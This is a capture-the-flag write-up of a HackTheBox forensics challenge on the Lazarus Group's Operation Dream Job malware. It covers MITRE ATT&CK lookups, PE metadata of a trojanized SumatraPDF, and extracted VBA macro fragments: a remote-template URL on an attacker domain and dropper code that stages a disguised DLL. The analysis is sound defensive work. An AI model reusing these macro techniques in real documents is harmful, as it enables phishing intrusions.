forensicsfreemedium

Dream Job-2 Sherlock Scenario

hackthebox

As a Threat Intelligence Analyst investigating **Operation Dream Job**, you have identified that the **Lazarus Group** utilized a variety of custom-built malware and tools to facilitate their operations. Your task is to analyze and gather intelligence on the malware utilized by this APT.

$ ls tags/ techniques/

pe_analysis apt upx vba_macro phishing lazarus_group threat_intelligence mitre_attack iso_malware ole_metadata virustotal operation_dream_job dratzarus torisma

vba_macro_extractionmitre_attack_researchiso_forensic_analysispe_metadata_extractionupx_packer_identificationole_metadata_forensicsvirustotal_osintdll_dropper_analysisshellcode_loader_analysis

Dream Job-2 Sherlock Scenario — HackTheBox

Description

As a Threat Intelligence Analyst investigating Operation Dream Job, you have identified that the Lazarus Group utilized a variety of custom-built malware and tools to facilitate their operations. Your task is to analyze and gather intelligence on the malware utilized by this APT.

Files provided:

17.dotm — Malicious Word template with VBA macro
BAE_HPC_SE.iso — ISO file containing trojanized SumatraPDF
Salary_Lockheed_Martin_job_opportunities_confidential.doc — Phishing document with VBA macro
Password for inner ZIP: Dvn62WlNrt09

Analysis

This is a 13-task Sherlock scenario combining MITRE ATT&CK threat intelligence research, malware artifact forensics, and OSINT to investigate the Lazarus Group's Operation Dream Job campaign. The challenge requires analyzing two custom malware families (DRATzarus, Torisma) via MITRE ATT&CK, performing forensic analysis on an ISO-delivered trojanized executable, and extracting intelligence from malicious VBA macros in Office documents.

Attack Overview

Operation Dream Job is a Lazarus Group campaign targeting defense and aerospace employees with fake job offers. The attack chain:

Phishing — Victims receive documents like Salary_Lockheed_Martin_job_opportunities_confidential.doc with embedded VBA macros
Payload delivery — Macros fetch remote templates or drop DLLs; ISO files deliver trojanized legitimate software
Execution — Trojanized SumatraPDF (InternalViewer.exe), DLL sideloading via wsuser.db
C2 — Custom malware (DRATzarus, Torisma) with encrypted communications

Key Malware Families

Malware	MITRE ID	Key Trait
DRATzarus	S0694	Similar to Bankshot; uses `IsDebuggerPresent` for anti-debug
Torisma	S0678	C2 encrypted with XOR + VEST-32; packed with LZ4 compression

Solution

Part 1: MITRE ATT&CK Intelligence (Tasks 1-4)

Task 1: What previously known malware does DRATzarus share similarities with?

Answer: Bankshot

From MITRE ATT&CK page for DRATzarus (S0694): "DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector."

Task 2: Which Windows API function does DRATzarus use to detect a debugger?

Answer: IsDebuggerPresent

From S0694 under technique T1622 (Debugger Evasion): "DRATzarus can use IsDebuggerPresent to detect whether a debugger is present on a victim."

Task 3: Torisma encrypted its C2 communications using XOR and which other method?

Answer: VEST-32

From MITRE ATT&CK page for Torisma (S0678) under T1573.001 (Encrypted Channel: Symmetric Cryptography): "Torisma has encrypted its C2 communications using XOR and VEST-32."

Task 4: Which packing method has been used to obfuscate Torisma?

Answer: lz4 compression

From S0678 under T1027.002 (Software Packing): "Torisma has been packed with lz4 compression."

Note: On the MITRE page, "lz4" may render as "Iz4" due to font rendering — the lowercase 'l' looks like uppercase 'I'. This is the well-known LZ4 compression algorithm.

Part 2: ISO Forensic Analysis (Tasks 5-8)

Task 5: Identify the executable contained within the ISO file

Answer: InternalViewer.exe

hdiutil mount BAE_HPC_SE.iso
ls -la /Volumes/BAE_HPC_SE/

Contents:

BAE_HPC_SE.pdf      (226,846 bytes — decoy PDF)
InternalViewer.exe  (10,507,264 bytes — PE32+ x86-64)

Task 6: What was the original name of the executable?

Answer: SumatraPDF.exe

import pefile

pe = pefile.PE("InternalViewer.exe")
for entry in pe.FileInfo[0]:
    if entry.Key == b'StringFileInfo':
        for st in entry.StringTable:
            for key, val in st.entries.items():
                print(f"{key.decode()}: {val.decode()}")

Output:

OriginalFilename: SumatraPDF.exe
ProductName: SumatraPDF
FileVersion: 3.2
CompanyName: Krzysztof Kowalczyk

Task 7: When was the EXE First Seen In The Wild on VirusTotal? (UTC)

Answer: 2020-08-13 08:44:50

import hashlib

with open("InternalViewer.exe", "rb") as f:
    sha256 = hashlib.sha256(f.read()).hexdigest()
# SHA256: adce894e3ce69c9822da57196707c7a15acee11319ccc963b84d83c23c3ea802

Queried VirusTotal API — first_seen_itw_date field returned 2020-08-13 08:44:50 UTC.

Additional VT info:

first_submission_date: 2020-06-05 09:20:22
PE compilation timestamp: 2020-05-12 19:26:17
Classification: trojan.nukesped/lazarus

Task 8: What packer was used to pack the executable? (Full name)

Answer: Ultimate Packer for eXecutables

PE section analysis reveals characteristic UPX sections:

Section   VirtualSize   RawSize
UPX0      34,689,024    0          (empty — decompression target)
UPX1      10,465,280    10,463,744 (compressed code)
.rsrc     45,056        42,496     (resources)

The pattern of UPX0 with zero raw size and UPX1 containing the compressed payload is the signature of UPX — Ultimate Packer for eXecutables.

Part 3: VBA Macro Analysis — Salary Document (Tasks 9-11)

Task 9: What is the full URL found within the macro?

Answer: https://markettrendingcenter.com/lk_job_oppor.docx

python3 -m oletools.olevba Salary_Lockheed_Martin_job_opportunities_confidential.doc

In the Frame1_Layout() subroutine:

Application.Documents.Open ("https://markettrendingcenter.com/lk_job_oppor.docx")

The macro also contained:

Heavy shellcode (Base64-encoded in MediaSection array)
WMVCORE.DLL loading
API calls: VirtualProtect, memcpy, NtQueryInformationProcess
In-memory code execution capability

Task 10: Who is the author of the document?

Answer: Mickey

exiftool Salary_Lockheed_Martin_job_opportunities_confidential.doc

Output: Author: Mickey

Task 11: Who last modified the document?

Answer: Challenger

From exiftool output:

Last Modified By: Challenger
Last Saved Date: 2021-10-18 13:06:00
Revision Number: 83

Part 4: VBA Macro Analysis — 17.dotm (Tasks 12-13)

Task 12: What is the directory where a suspicious folder was created?

Answer: \AppData\Local\Microsoft\Notice

python3 -m oletools.olevba 17.dotm

In the GetDllName() function (Module1.bas):

workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice"
If Not FolderExist(workDir) Then
    MkDir (workDir)
End If

Task 13: Which suspicious file was checked for existence in that directory?

Answer: wsuser.db

In the same GetDllName() function:

binName = "wsuser.db"
dllPath = workDir & "\" & binName
Do While FileExist(dllPath)
    ...
Loop

The full attack chain in this macro:

Creates \AppData\Local\Microsoft\Notice\ directory
Checks if wsuser.db exists
Extracts a DLL payload (Base64-decoded from UserForm1 labels)
Saves it as wsuser.db (DLL disguised as SQLite database)
Loads via LoadLibraryA
Calls exported function sqlite3_stmt_all — a malicious export masquerading as a legitimate SQLite function

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md

$ grep --similar

Similar writeups

[forensics][Pro]oBfsC4t10n— HackTheBox
[forensics][Pro]Stockpile Breach— 0xl4ugh
[forensics][free]Diagnostic— hackthebox
[forensics][free]oBfsC4t10n2— hackthebox
[forensics][free]TrueSecrets— hackthebox